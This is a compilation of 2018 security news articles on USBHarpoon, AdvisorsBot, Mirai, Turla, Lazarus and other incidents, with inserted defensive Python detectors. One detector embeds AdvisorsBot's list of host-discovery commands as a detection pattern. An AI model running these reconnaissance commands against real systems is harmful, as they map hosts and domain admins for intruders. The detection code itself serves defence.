Mitnick then contacted the researcher Dennis Goh to build a cable for the attack; Goh accepted and worked with Olaf Tan to build the USBHarpoon.

Once MG saw the USBHarpoon, he commented that the cable is the same one he designed, images of which he had shared with Mitnick.

MG, replying to @kevinmitnick, @vysecurity, @LucaBongiorni and @P4wnP1 on Twitter on Aug 21, 2018:

“Heh, looks like the same boots I showed Kevin earlier this year, but with tape holding together? Just use some potting compound to seal it!
Hey @vysecurity did you do anything besides adding 2 resistors for charge pass through? That seems to work fine. Data passthrough though...”
Yiu confirmed that his cable was not inspired by MG’s research, but he credited MG’s original work once he learned about it.

USBHarpoon works on unlocked machines; it allows the attackers to launch commands that download and execute malicious code.

Yiu published a short video to show how USBHarpoon works. The video PoC shows a drone connected to a Windows PC that sends it commands to list the contents of a folder on the system drive.

Experts noticed that on Windows, the commands are launched within the Run prompt, while on Mac and Linux they are launched from a terminal.

The attack is in any case visible to the owner of the machine; for this reason, to make the attack stealthy it is necessary to devise a method to hide the interaction with the system, for example by running the attack when the victim is not near the machine.
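Because a cable of this kind has to enumerate as a keyboard (a HID device) before it can type anything, the kernel log records its arrival even when the typing itself is missed. The snippet below is an added example, not code from the USBHarpoon team or from MG: it parses `hid-generic` lines in the format the Linux HID subsystem prints and reports keyboards or mice that appeared on a USB port outside an allow-list. The log lines, device names and vendor/product ids are constructed for the example; a real deployment would feed it `dmesg` or journal output and populate the allow-list from a known-good inventory.

```python
"""Flag unexpected USB keyboard/mouse enumeration in kernel log output.
Added example; the sample lines below are constructed (invented vendor and
product ids), not captured from a real device.
"""
import re

# Constructed kernel log excerpt: a new keyboard on port 1-2, then a storage
# device on port 1-3 which must not be reported.
SAMPLE_DMESG = """\
[ 1201.118] usb 1-2: new full-speed USB device number 7 using xhci_hcd
[ 1201.260] usb 1-2: New USB device found, idVendor=1234, idProduct=abcd, bcdDevice= 1.00
[ 1201.301] input: Generic Keyboard as /devices/pci0000:00/0000:00:14.0/usb1/1-2/1-2:1.0/0003:1234:ABCD.0005/input/input19
[ 1201.360] hid-generic 0003:1234:ABCD.0005: input,hidraw2: USB HID v1.11 Keyboard [Generic Keyboard] on usb-0000:00:14.0-2/input0
[ 1205.010] usb 1-3: new high-speed USB device number 8 using xhci_hcd
[ 1205.100] usb-storage 1-3:1.0: USB Mass Storage device detected
"""

# Shape of the line the hid-generic driver logs when it binds an input device.
HID_LINE = re.compile(
    r"hid-generic (?P<hid>[0-9A-F]{4}:[0-9A-F]{4}:[0-9A-F]{4}\.[0-9A-F]{4}): "
    r"\S+: USB HID v[\d.]+ (?P<kind>\w+) \[(?P<name>[^\]]*)\] on (?P<port>\S+)"
)

# Device kinds that can inject input; a cable that "types" shows up as one of these.
INPUT_KINDS = {"Keyboard", "Mouse"}


def find_unexpected_hid_inputs(log_text, trusted_ports=()):
    """Return keyboard/mouse bindings whose USB port is not in trusted_ports."""
    findings = []
    for line in log_text.splitlines():
        match = HID_LINE.search(line)
        if not match:
            continue
        if match.group("kind") not in INPUT_KINDS:
            continue
        if match.group("port") in trusted_ports:
            continue
        findings.append({
            "hid": match.group("hid"),
            "kind": match.group("kind"),
            "name": match.group("name"),
            "port": match.group("port"),
        })
    return findings


if __name__ == "__main__":
    for f in find_unexpected_hid_inputs(SAMPLE_DMESG):
        print(f"new {f['kind']} '{f['name']}' ({f['hid']}) on {f['port']}")
```

The allow-list is keyed on the physical port path rather than the vendor id, because a cable can present any id it likes but cannot change which socket it is plugged into. On Windows the equivalent signal is the PnP device-install event for a new HID keyboard.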

The team of researchers is currently searching for methods to trigger the attack in a stealthy way, for example, involving as attack vectors Bluetooth and radio signals.

As mitigation, the experts suggest the adoption of USB condoms, also known as data-blocking devices, which work by blocking the data pins of a USB cable.

However, MG published a video PoC that shows how USB condoms can be bypassed as well.

MG on Twitter, Jan 13, 2018:

“#3 - BadUSB Cables wouldn't be complete without BadUSB Condoms. Tempted to get a run of these made for the vendor area at the next security con.”
USBHarpoon demonstrates that USB devices can be used as attack vectors that are difficult to detect.

Australia banned Huawei from 5G network due to security concerns
25.8.2018 securityaffairs BigBrothers

Chinese-owned telecommunications firm Huawei has been banned from Australia’s 5G network due to security concerns.
The Australian government considers Huawei’s involvement in the rollout of next-generation 5G communication networks risky.

Huawei Australia called the decision disappointing.

Huawei Australia on Twitter, Aug 23, 2018:

“We have been informed by the Govt that Huawei & ZTE have been banned from providing 5G technology to Australia. This is a extremely disappointing result for consumers. Huawei is a world leader in 5G. Has safely & securely delivered wireless technology in Aust for close to 15 yrs”
The Chinese company was founded by a former People’s Liberation Army official in 1987.

The US was the first country that warned of the security risks associated with the usage of the products manufactured by the Chinese telecommunications giant.

The Chinese firm denies having shared Australian customer data with the Chinese intelligence, but it is not enough for the Australian Government.

Australian authorities also banned the Chinese firm ZTE Corp.

Huawei Australia Chairman John Lord explained in June that banning one of the world’s leading 5G suppliers could impact Australia’s economic growth and productivity for generations.

The Chinese Government is concerned about the decision of the Australian Government.

“We urge the Australian government to discard ideological biases and create a level playing field for Chinese companies’ operations in Australia,” said Foreign Ministry spokesman Lu Kang.

In May, the Pentagon ordered retail outlets on US military bases to stop selling Huawei and ZTE products due to the unacceptable security risk they pose.

The Pentagon considers the security risk posed by devices manufactured by the Chinese firms unacceptable; US officials believe the smartphones could be used to spy on military personnel.

“Huawei and ZTE devices may pose an unacceptable risk to the department’s personnel, information and mission,” said Pentagon spokesman Major Dave Eastburn.

“In light of this information, it was not prudent for the department’s exchanges to continue selling them.”

In February, Dan Coats, the Director of National Intelligence, along with several other top intel officials, invited Americans to avoid buying Huawei and ZTE products.

The restaurant chain Cheddar’s Scratch Kitchen has suffered a payment card breach
25.8.2018 securityaffairs Incident

The restaurant chain Cheddar’s Scratch Kitchen suffered a payment card breach; hackers were inside the company network between Nov. 3, 2017 and Jan. 2, 2018.
Once again we are here to discuss a data breach suffered by a restaurant chain; this time the victim is Cheddar’s Scratch Kitchen.

The news has been confirmed by the company that was informed of the data breach this month.

Attackers breached the company network between Nov. 3, 2017 and Jan. 2, 2018 and stole customer payment card data.

“Cheddar’s Scratch Kitchen restaurants have been the victims of cyberattacks, which may have resulted in unauthorized access to or acquisition of your payment card information.” reads the data breach notification.

“On August 16, 2018, Cheddar’s Scratch Kitchen (a concept acquired by Darden Restaurants in 2017) learned that between November 3, 2017 and January 2, 2018, an unauthorized person or persons gained access to the Cheddar’s Scratch Kitchen network and were able to access and potentially obtain payment card information used to make purchases in certain Cheddar’s Scratch Kitchen restaurants.”

Restaurants affected by the security breach are in Alabama, Arizona, Arkansas, Delaware, Florida, Illinois, Indiana, Iowa, Kansas, Louisiana, Maryland, Michigan, Missouri, Nebraska, New Mexico, North Carolina, Ohio, Oklahoma, Pennsylvania, South Carolina, Texas, Virginia, and Wisconsin.


Cheddar’s Scratch Kitchen hired a third-party cybersecurity firm to investigate the security breach, and the investigation is still ongoing. It seems that the hackers compromised a network that was permanently disabled and replaced by April 10, 2018; current systems and networks were not impacted by this incident.

“The unauthorized access appears to have occurred on a network that was permanently disabled and replaced by April 10, 2018.” continues the notification.

“It’s important to note that there are no indications of unauthorized access to the current Cheddar’s Scratch Kitchen network and systems.”

The company is recommending that customers enrol in the identity protection services it is providing. Customers should remain vigilant and take steps to protect themselves from identity theft by reviewing their account statements and by periodically checking their credit report from one or more of the national credit reporting agencies.

The company is offering a free annual credit report from each of the nationwide credit reporting companies—Equifax, Experian, and TransUnion.

AdvisorsBot Malware Downloader Discovered
24.8.2018 securityweek Virus

Proofpoint security researchers have discovered a previously undocumented downloader that appeared in malicious email campaigns targeting hotels, restaurants, and telecommunications entities.

The attacks, attributed to a threat actor tracked as TA555, are leveraging the downloader as a first-stage payload, to load a module performing fingerprinting of the targeted machine. Presumably, once a target of interest has been identified, additional modules are loaded onto the system.

Dubbed AdvisorsBot, the malware was first observed in May 2018. It is written in C and is under active development, Proofpoint says. In fact, the security firm has already observed malware versions completely rewritten in PowerShell and .NET.

The early command and control (C&C) domains used by the malware all contained the word “advisors,” hence the malware’s name.

Initially, the attacks leveraged macros to execute a PowerShell command that would fetch and run AdvisorsBot. In early August, the PowerShell command would download another PowerShell script to execute embedded shellcode that would run the downloader without writing it to disk, while the macro in the latest attacks fetched a PowerShell version of AdvisorsBot directly.

The threat includes anti-analysis features, such as the use of junk code, including extra instructions, conditional statements, and loops, to slow down reverse engineering. The x86 version of the malware contains significantly more junk code, Proofpoint security researchers have discovered.

AdvisorsBot can also detect various analysis tools and checks whether it is running on a virtual machine. More recent malware variants were improved with additional anti-analysis checks, the researchers say.

The threat communicates with the C&C server over HTTPS. The data it sends to the server includes information about the system, such as machine SID, CRC32 hash of the computer name, some unknown hardcoded values, and the Windows version.

Commands from the C&C arrive via GET requests, but the malware only includes support for two commands at the moment. Based on that, it can either load a module or load a shellcode in a thread.

Only the system fingerprinting module was observed being sent from a C&C server. It can take screenshots, extract Microsoft Outlook account details, and run a series of system commands (including systeminfo, ipconfig /all, netstat -f, net view, tasklist, whoami, net group "domain admins" /domain, and dir %USERPROFILE%\Desktop).
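The fingerprinting module's command list is a detection opportunity: the individual commands are all legitimate, but a burst of several of them from one parent process within a short window is unusual on a workstation. The code below is an added example, not Proofpoint's detection logic: it normalises command lines from constructed process-creation records (a simplified pipe-delimited shape, not Sysmon's real schema), matches them against the commands listed above, and raises an alert when one parent process runs at least four distinct recon commands within five minutes. Host names, PIDs, timestamps and the threshold are assumptions for the example.

```python
"""Detect a burst of host-discovery commands from a single parent process.
Added example; not the vendor's detection.  Log records are constructed and
use a simplified format: timestamp|host|parent(pid)|command line.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Discovery commands the fingerprinting module runs, in normalised form
# (lower case, double quotes removed, single spaces).
RECON_COMMANDS = [
    "systeminfo",
    "ipconfig /all",
    "netstat -f",
    "net view",
    "tasklist",
    "whoami",
    "net group domain admins /domain",
    "dir %userprofile%\\desktop",
]

# Constructed records: one burst from a PowerShell parent on WS01 and two
# harmless commands from an interactive shell on WS02.
SAMPLE_LOG = """\
2018-08-20T10:15:01Z|WS01|powershell.exe(1234)|cmd.exe /c systeminfo
2018-08-20T10:15:02Z|WS01|powershell.exe(1234)|cmd.exe /c ipconfig /all
2018-08-20T10:15:02Z|WS01|powershell.exe(1234)|cmd.exe /c netstat -f
2018-08-20T10:15:03Z|WS01|powershell.exe(1234)|cmd.exe /c net view
2018-08-20T10:15:03Z|WS01|powershell.exe(1234)|cmd.exe /c tasklist
2018-08-20T10:15:04Z|WS01|powershell.exe(1234)|cmd.exe /c whoami
2018-08-20T10:15:04Z|WS01|powershell.exe(1234)|cmd.exe /c net group "domain admins" /domain
2018-08-20T10:15:05Z|WS01|powershell.exe(1234)|cmd.exe /c dir %USERPROFILE%\\Desktop
2018-08-20T10:20:00Z|WS02|explorer.exe(880)|cmd.exe
2018-08-20T10:20:10Z|WS02|cmd.exe(2210)|ipconfig /all
2018-08-20T10:21:00Z|WS02|cmd.exe(2210)|whoami
"""


def normalize(cmdline):
    """Lower-case, drop quotes, collapse whitespace, strip a leading cmd /c or /k."""
    text = cmdline.strip().lower().replace('"', "")
    text = re.sub(r"\s+", " ", text)
    text = re.sub(r"^cmd(\.exe)? /[ck] ", "", text)
    return text


def classify(cmdline):
    """Return the matching recon command, or None for anything else."""
    text = normalize(cmdline)
    for pattern in RECON_COMMANDS:
        if text == pattern or text.startswith(pattern + " "):
            return pattern
    return None


def parse_record(line):
    timestamp, host, parent, cmdline = line.split("|", 3)
    return datetime.strptime(timestamp, "%Y-%m-%dT%H:%M:%SZ"), host, parent, cmdline


def detect_recon_bursts(lines, window=timedelta(minutes=5), threshold=4):
    """One alert per (host, parent) that runs >= threshold distinct recon
    commands inside any window-long span."""
    events = defaultdict(list)  # (host, parent) -> [(time, recon command)]
    for line in lines:
        if not line.strip():
            continue
        when, host, parent, cmdline = parse_record(line)
        kind = classify(cmdline)
        if kind:
            events[(host, parent)].append((when, kind))

    alerts = []
    for (host, parent), seen in events.items():
        seen.sort()
        for index, (start, _) in enumerate(seen):
            inside = {kind for when, kind in seen[index:] if when - start <= window}
            if len(inside) >= threshold:
                alerts.append({"host": host, "parent": parent, "first_seen": start,
                               "count": len(inside), "commands": sorted(inside)})
                break
    return alerts


if __name__ == "__main__":
    for alert in detect_recon_bursts(SAMPLE_LOG.splitlines()):
        print(f"{alert['host']} {alert['parent']}: {alert['count']} recon commands "
              f"from {alert['first_seen']:%H:%M:%S}: {', '.join(alert['commands'])}")
```

Keying on the parent process is what separates the module's burst from an administrator typing the same commands by hand: the former all descend from the process that loaded the downloader, the latter from an interactive shell spread over a longer span. The threshold should be tuned against a baseline of the environment's own administrative tooling before it is used for alerting.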

The most recent AdvisorsBot campaign employed a new version of the malware, rewritten using PowerShell and a .NET DLL embedded inside the PowerShell script. Tracked as PoshAdvisor, the malware is not an exact duplicate of AdvisorsBot, but is highly similar to it.

“While it remains to be seen whether this threat actor will continue to distribute AdvisorsBot, PoshAdvisor, or both in future campaigns, this pair of downloaders, with extensive anti-analysis features and increasingly sophisticated distribution techniques, warrant further investigation,” Proofpoint concludes.

Severe Flaws Found in Yokogawa Switches, Control Systems
24.8.2018 securityweek ICS

Japanese electrical engineering company Yokogawa published two security advisories last week to inform customers that some of its products are affected by serious vulnerabilities.

One of the flaws, for which ICS-CERT also published an advisory, is CVE-2018-0651, a high severity stack-based buffer overflow affecting the license management function present in some products.

Sending specially crafted data to the licensing function could cause it to stop, but users have been warned that an unprivileged attacker with network access to the targeted system may also be able to exploit the flaw for arbitrary code execution.

According to Yokogawa and ICS-CERT, the security hole impacts the ASTPLANNER production scheduling software, the TriFellows package for the CENTUM CS control system, STARDOM control systems, and the iDefine functional safety management tool for the ProSafe-RS process safety system.

Yokogawa has already released a patch for STARDOM controllers and it plans on issuing a fix for iDefine. ASTPLANNER and TriFellows customers have been advised to contact the company’s support team.

The second vulnerability, which impacts more than a dozen of Yokogawa’s Vnet/IP industrial switches, has also been classified as “high severity,” but no CVE identifier has been assigned.

The flaw affects the debugging functionality of these devices. The problem is related to the tcpdump command, which is used for monitoring and analyzing network traffic. The tcpdump command is disabled by default, but if users have enabled it, an unprivileged network attacker could use it to disrupt the connection or make changes to the switch’s configuration.

A few months ago, Yokogawa informed users that it released a firmware update for its STARDOM controllers to address a critical hardcoded credentials vulnerability that can be exploited remotely to take control of a device.

Wickr Partners with Psiphon to Improve Network Availability
24.8.2018 securityweek IT

Despite government demands for backdoors into end-to-end encryption, it remains a legitimate requirement for business. Political tensions affect, but don't stop, international commerce; and business teams visiting foreign countries need to know that their communications are secure and delivered. The problem is domestic as well as international -- staff are increasingly mobile and work from any hotspot or free WiFi location they can find.

Such internet users need to know that their data remains secure from whatever location they use. This is a requirement solved by Wickr. It provides encrypted communication from source to destination whatever the location. Traveling staff can use any internet cafe or hotspot confident that their content cannot be sniffed.

But there remains a problem. Some of those source locations impose local restrictions on traffic -- it could be anything from traffic management controls to ISP restrictions, or simply a flaky network. The result is that Wickr content may be secure, but delivery can become problematic. To solve this problem Wickr has partnered with Psiphon to create WOA -- Wickr Open Access.

"Wickr already solves the crypto part," Joel Wallenstrom, president and CEO of Wickr told SecurityWeek. It triple-encrypts every bit of streaming data and applies perfect forward and perfect backward secrecy. "But a really critical part of enterprise communication is availability. That's why we've partnered with Psiphon. Together, we've developed something unique in the market, combining our encryption with how Psiphon ensures a robust and always-available network."

Psiphon can be described as a smart VPN. WOA combines Wickr's cryptography with Psiphon's network availability to provide consistent deliverable security, anywhere.

Chris Lalonde, Wickr's COO, explains. "Global enterprises have teams all over the world and they have people traveling all the time. The challenge that you face is that in many cases you are on an unpredictable network -- whether that's a coffee shop in Soho, a cafe in Paris, or some place in Hong Kong. What happens in a lot of those cases is users end up getting frustrated. They tend to think that it is the application when really it's the network they're using."

Enterprises have two problems: mobile workers traveling locally, using local coffee shops with poor network connectivity and the potential for industrial espionage; and international business teams visiting nations with what we might term repressive governments. Wallenstrom describes the first. "If you're in a local coffee shop with free wifi it may have certain protocols restricted in order to maximize web-serving traffic. What that means for an end user trying to get on a call for a business meeting is it just doesn't work. This happens anywhere where the coffee shop is trying to optimize its free stuff -- to the end user, it just feels like the application is crappy."

Michael Hull, president of Psiphon Inc (which grew out of a Citizen Lab project), provides the international perspective. "There are probably 30 to 40 countries in the world where governments, ISPs and security agencies are all colluding together to control the local population and economy," he told SecurityWeek. "This is the problem that Psiphon was founded to solve. We've been providing an anti-censorship solution to the big international broadcasters for the last ten years or so. The BBC uses us, the Voice of America, Radio Free Europe and more use us to make sure that when governments try to intervene to prevent people from accessing information in contravention of Article 19 of the UN Declaration of Human Rights, we have a very sophisticated smart VPN that is capable of getting around large scale filtering systems and so on. We've honed our technology in the classic regions like China, Iran and Russia. The internet is being regularly disrupted by different ISPs for various reasons, some of them human rights related, some are business related."

Wickr has integrated the technology developed by Psiphon to ensure reliable network routing through the vagaries of both the local coffee shop and intrusive foreign governments. Psiphon operates 3500 servers, hosted on third-party cloud providers, throughout the world -- ensuring that Wickr's encrypted traffic can get from anywhere in the world to anywhere in the world safely, securely and predictably.

"We're enabling users to simply put their application to work all the time, anywhere," said Lalonde. "Combining with Psiphon, WOA enables users to have a one-two punch to not only secure their data end-to-end but to make sure it gets to where it needs to go."

This gives it another practical enterprise application: incident response. "Let's say that my corporate network has been hacked," explained Wallenstrom, "and I don't know what to trust and what not to trust on my infrastructure. An attacker could be doing all sorts of things to my network traffic in order to see what the incident response team is doing. This happens -- it happened in the Sony hack. WOA gives the CISO and incident response team assurance that not only are the messages encrypted, but they are getting through to the destination when they need to."

"In today’s world," says Lalonde, "end users are rarely aware of the networks across which their data is transmitted. Sometimes networks are restricted, other times they are degraded or monitored. With WOA, users can be certain that their data is secure in transit, their critical communications make it to the intended recipients and no service provider -- including Wickr -- has access to end user data."

Psiphon describes its product as a circumvention tool that utilizes VPN, SSH and HTTP Proxy technology to provide uncensored access to Internet content. But it is more than a VPN that gives access to Pirate Bay when the local ISP blocks it. Wickr is using Psiphon to not just bypass the local ISP, but to bypass problematic local networks to ensure that traveling teams can maintain secure communications from even the most far-flung locations.

The enterprise version is available today. It will be rolled out to other versions of Wickr, including the free version, in the future.

Cross-Platform Mirai Variant Leverages Open-Source Project
24.8.2018 securityweek IoT

A newly discovered Mirai variant has been created using an open-source project that makes the process of cross compilation very easy, Symantec reports.

Mirai, a piece of malware that first emerged in the fall of 2016, targets a broad range of Internet of Things (IoT) devices to ensnare them into botnets capable of launching massive distributed denial of service (DDoS) attacks.

Numerous Mirai variants have emerged since the malware’s source code was leaked in October 2016, targeting a broader range of devices and increasing resilience. Some of the most recent Mirai iterations include Wicked, Satori, Okiru, Masuta, and others.

Now, Symantec says its researchers discovered a Mirai variant compatible with multiple architectures. More robust compared to previously observed iterations, the sample has been built using the open-source project called Aboriginal Linux.

The platform has been designed to make cross compilation a simple task, allowing software authors to create images targeting multiple architectures, including ARM, MIPS, PowerPC, and x86.

Apparently, this is exactly why the developers behind the new Mirai variant chose Aboriginal Linux too. When compiled using the open source project, the malware can be executed on a variety of devices, including routers, IP cameras, other types of connected products, and Android devices.

“Given that the existing code base is combined with an elegant cross compilation framework, the resultant malware variants are more robust and compatible with multiple architectures,” Symantec researcher Dinesh Venkatesan explains.

The observed sample includes functionality consistent with Mirai’s behavior, the security researcher says. The infection starts with a shell script on a vulnerable device, which attempts to download and run individual executables until the binary compliant with the current architecture is found.

When executed on an infected device, the Mirai payload attempts to spread to devices with default credentials or vulnerabilities. The new sample was observed scanning over 500,000 randomly generated IP addresses and attempting to deliver raw packet data over port 23.
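A random-address sweep on port 23 like the one described above is visible in flow data, which is where a defender would look for it. The following is an added example, not code from Symantec's analysis or from the article: it flags sources that contact many distinct hosts on TCP/23 across unrelated /8 blocks within a short window, separating a scanner from an admin managing a few telnet devices in one subnet; the flow-record format, thresholds and sample records are constructed assumptions.

```python
"""Flag Mirai-style telnet sweeps in simple flow records (added example).

Record format (constructed for this example): "<iso-timestamp> <src> <dst> <dport> <proto>".
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta
from ipaddress import ip_address

# Constructed sample: 10.0.0.7 hits ten unrelated hosts on tcp/23 within five
# seconds (a random-target sweep), 10.0.0.21 is an admin box talking telnet to
# two switches in its own subnet, and one flow is ordinary web traffic.
SAMPLE_FLOWS = """\
2018-08-24T10:00:00 10.0.0.7 203.0.113.5 23 tcp
2018-08-24T10:00:00 10.0.0.7 198.51.100.77 23 tcp
2018-08-24T10:00:01 10.0.0.7 192.0.2.9 23 tcp
2018-08-24T10:00:01 10.0.0.7 203.0.113.200 23 tcp
2018-08-24T10:00:02 10.0.0.7 198.51.100.13 23 tcp
2018-08-24T10:00:02 10.0.0.7 192.0.2.250 23 tcp
2018-08-24T10:00:03 10.0.0.7 203.0.113.99 23 tcp
2018-08-24T10:00:03 10.0.0.7 198.51.100.8 23 tcp
2018-08-24T10:00:04 10.0.0.7 192.0.2.33 23 tcp
2018-08-24T10:00:04 10.0.0.7 203.0.113.17 23 tcp
2018-08-24T10:00:05 10.0.0.21 10.0.1.2 23 tcp
2018-08-24T10:00:05 10.0.0.21 10.0.1.3 23 tcp
2018-08-24T10:00:06 10.0.0.21 10.0.1.2 23 tcp
2018-08-24T10:00:07 10.0.0.7 198.51.100.44 80 tcp
"""


def parse_flows(text):
    """Parse flow lines into dicts; malformed lines are skipped rather than raising."""
    flows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 5:
            continue
        ts, src, dst, dport, proto = parts
        try:
            flows.append({
                "ts": datetime.fromisoformat(ts),
                "src": ip_address(src),
                "dst": ip_address(dst),
                "dport": int(dport),
                "proto": proto.lower(),
            })
        except ValueError:
            continue  # unparsable timestamp, address or port
    return flows


def detect_telnet_sweeps(flows, window=timedelta(seconds=60),
                         min_targets=8, min_slash8=3):
    """Return {src: peak distinct tcp/23 targets} for sources that look like sweepers.

    A source is flagged when, inside one sliding window, it contacts at least
    min_targets distinct IPv4 hosts on tcp/23 spread over at least min_slash8
    different /8 blocks. The spread check is what distinguishes randomly
    generated targets from an operator enumerating one managed subnet.
    Thresholds are constructed defaults, not values from the article.
    """
    telnet = sorted(
        (f for f in flows
         if f["dport"] == 23 and f["proto"] == "tcp" and f["dst"].version == 4),
        key=lambda f: f["ts"],
    )
    recent = defaultdict(deque)  # src -> (ts, dst) pairs still inside the window
    alerts = {}
    for f in telnet:
        q = recent[f["src"]]
        q.append((f["ts"], f["dst"]))
        while q and f["ts"] - q[0][0] > window:
            q.popleft()
        targets = {dst for _, dst in q}
        blocks = {int(dst) >> 24 for dst in targets}  # first octet of each target
        if len(targets) >= min_targets and len(blocks) >= min_slash8:
            src = str(f["src"])
            alerts[src] = max(alerts.get(src, 0), len(targets))
    return alerts


if __name__ == "__main__":
    for src, n in detect_telnet_sweeps(parse_flows(SAMPLE_FLOWS)).items():
        print(f"possible telnet sweep from {src}: {n} distinct targets on tcp/23")
```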

While the Aboriginal Linux project is not malicious, this is yet another example of how malware authors leverage open-source software for their nefarious purposes, Venkatesan points out.

Turla Backdoor Controlled via Email Attachments
24.8.2018 securityweek APT

ESET security researchers have analyzed a new backdoor used by the Russian-speaking advanced persistent threat (APT) group known as Turla.

Also known as Snake or Uroburos, Turla has been active since at least 2007, targeting governments, state officials, diplomats, and military authorities, including Swiss defense firm RUAG and the U.S. Central Command, among others.

Last year, security researchers discovered a link between the group and one of the earliest known state-sponsored cyberespionage operations carried out in the ‘90s.

In 2017, Turla targeted Germany’s Federal Foreign Office, implanting a backdoor on several computers and stealing data for almost the entire year. The hackers first compromised the network of the country’s Federal College of Public Administration and leveraged it to breach the network of the Foreign Office in March 2017.

Now, ESET reveals that the backdoor used in this attack was also used to “open a covert access channel to the foreign offices of another two European countries, as well as to the network of a major defense contractor.”

The backdoor was supposedly created as far back as 2009 and has received numerous updates over time, getting new functionality, including stealth and resilience. A version discovered in April 2018 can execute malicious PowerShell scripts directly in memory, a tactic many actors have been adopting over the past few years.

The malware now targets Microsoft Outlook, subverting the application’s legitimate Messaging Application Programming Interface (MAPI) to access the targets’ mailboxes. Previously, it was observed targeting The Bat! email client, ESET notes.

The backdoor doesn’t use a conventional command-and-control (C&C) infrastructure, being operated via specially crafted PDF files in email attachments instead. The malware is delivered in the form of a Dynamic Link Library (DLL) module and is installed using a legitimate Windows utility (RegSvr32.exe).

For persistence, the threat modifies Windows registry entries. Specifically, it leverages the “COM object hijacking” technique, which ensures that the backdoor is activated each time Microsoft Outlook is launched.

The backdoor generates logs on every sent or received email message (with information on sender, recipient, subject, and attachment name), and regularly bundles the logs together with other data and sends them to Turla’s operators via a PDF attached to an email message.

For each incoming email, the malware checks for the presence of a PDF that may contain commands and accepts commands from anyone able to encode them into a PDF document. This means that Turla’s operators can regain control of an infected machine by sending commands from any email address.

“The backdoor’s level of resilience to takedowns is almost on a par with that of a rootkit that, in inspecting inbound network traffic, listens for commands from its operators,” ESET notes.

On compromised machines, the malware goes to lengths to stay undetected, and no email received from the attacker ever appears in the mailbox. Moreover, the backdoor also blocks all notifications of incoming email messages that have been sent by its operators.

The malware includes support for a broad range of commands, including file manipulation, shell command execution, process creation, directory manipulation, and more, ESET reveals in a technical analysis (PDF). The main purpose of the malware is data exfiltration and the download and execution of additional programs or commands.

“The Turla backdoor is a fully-fledged backdoor that uses customized and proprietary techniques, can work independently of any other Turla component, and is fully controlled by email. In fact, ESET researchers are not aware of any other espionage group currently utilizing a backdoor that is entirely controlled by emails, and specifically through PDF attachments,” ESET concludes.

Monthly Patches Are Recommended Best Practice for Android, Google Says
24.8.2018 securityweek Android

The timely delivery of security updates for Android smartphones is a highly important defense-in-depth strategy, Google says.

Each month for the past three years, the search company has been releasing security patches for the Android platform and has been also urging device manufacturers to push the updates to their users in a timely manner.

In October last year, Kaspersky revealed that the security fixes were still slow to arrive on many devices. Things aren’t looking much better this year either, as Security Research Labs revealed in April: manufacturers often omit patches when releasing security updates.

Now, three years after the critical Stagefright flaw prompted Google to take a more active stance on addressing vulnerabilities in Android, the Internet giant says that monthly security updates are the recommended best practice for Android smartphones.

Google is providing manufacturers with monthly Android source code patches so they can include those in firmware updates, and also allows them to leverage the Google firmware over-the-air (FOTA) servers for free.

Moreover, the search company pushes its own set of updates over-the-air to Pixel devices and also requires that these monthly patches be released for all devices in the Android One program.

According to Google, Android manufacturers should at least deliver regular “security updates in advance of coordinated disclosure of high severity vulnerabilities,” which are usually published in Android bulletins.

“Since the common vulnerability disclosure window is 90 days, updates on a 90-day frequency represents a minimum security hygiene requirement,” Google notes.

This is also one of the requirements for Android devices to be listed in the Android Enterprise Recommended program: devices should receive security patches at least every 90 days, with monthly updates strongly recommended.

To make the update process easier for device makers, Google has improved Android’s modularity, so that subsystems can be updated individually, without impacting others.

“The modularity strategy applies equally well for security updates, as a framework security update can be performed independently of device specific components,” Google explains.

The company also developed security update testing systems that are meant to ensure patches aren’t omitted when security updates are released.

A new testing infrastructure allows manufacturers “to develop and deploy automated tests across lower levels of the firmware stack that were previously relegated to manual testing,” Google says. The Android build approval process now also scans device images for specific patterns to reduce the risk of omission.

Last year, security updates arrived on around a billion Android devices, a 30% growth over the preceding year, and Google expects the growth to continue. Thus, the company aims to decrease the incidence of potentially harmful exploitation of bugs.

“We continue to work hard devising thoughtful strategies to make Android easier to update by introducing improved processes and programs for the ecosystem. In addition, we are also working to drive increased and more expedient partner adoption of our security update and compliance requirements,” Google reveals.

North Korean Hackers Hit Cryptocurrency Exchange with macOS Malware
24.8.2018 securityweek Apple

In a recent attack against a cryptocurrency exchange, the North Korea-linked Lazarus group went the extra mile by deploying malware for macOS, Kaspersky Lab has discovered.

Active since at least 2009 and supposedly backed by the North Korean government, Lazarus is considered the most serious threat to banks. The group is said to have orchestrated a large number of high profile attacks, including the Sony hack in 2014 and last year’s WannaCry outbreak.

In recent months, in addition to banks, the group focused on various cryptocurrency exchanges. In one of the attacks, which Kaspersky refers to as Operation AppleJeus, the group tricked an unsuspecting employee into downloading a trojanized cryptocurrency trading application that covertly downloaded and installed the Fallchill malware.

What made this attack stand out compared to other Lazarus-linked incidents, however, was the fact that the attackers designed their malware to target macOS too, in addition to Windows. This is the first time Lazarus is observed using malware for Apple’s operating system, Kaspersky says.

“The fact that the Lazarus group has expanded its list of targeted operating systems should be a wake-up call for users of non-Windows platforms,” the security firm points out.

The malicious code, however, wasn’t delivered alongside the application’s installation package. Instead, it was pushed to the target machine in the form of an update, Kaspersky’s security researchers have discovered.

The legitimate-looking application is called Celas Trade Pro and comes from Celas Limited. An all-in-one style cryptocurrency trading program, it showed no signs of malicious behavior at first.

However, at the end of the installation process, it was seen running the Updater.exe module, which would collect system information and send it back to the server in the form of a GIF image.

Based on the server’s response, the updater either keeps quiet or extracts a payload with base64 and decrypts it using RC4 with another hardcoded key to retrieve an executable file.

“For macOS users, Celas LLC also provided a native version of its trading app. A hidden ‘autoupdater’ module is installed in the background to start immediately after installation, and after each system reboot,” Kaspersky explains.

The module would continuously contact the command and control (C&C) server to fetch and run an additional executable file. The communication with the server is performed in a manner similar to that employed by the Windows version, with the system information being sent encrypted, disguised as an image file upload and download.

The Updater application is not listed in the Finder app or in a default Terminal directory listing, and is passed the command-line argument “CheckUpdate” at launch. Apparently, the application quits if no argument is supplied, likely a way to evade detection by sandboxes that run the binary without arguments.

The updater works the same as the Windows variant, both being implemented using the cross-platform Qt framework. At execution, it creates a unique identifier for the infected host, collects basic system information, then encrypts the data and transfers it to the attacker’s server.

The dropped executable file has an unusually large size, likely because it was inflated with junk data. The main purpose of the malware is to implant the Fallchill backdoor loader onto the compromised machine.

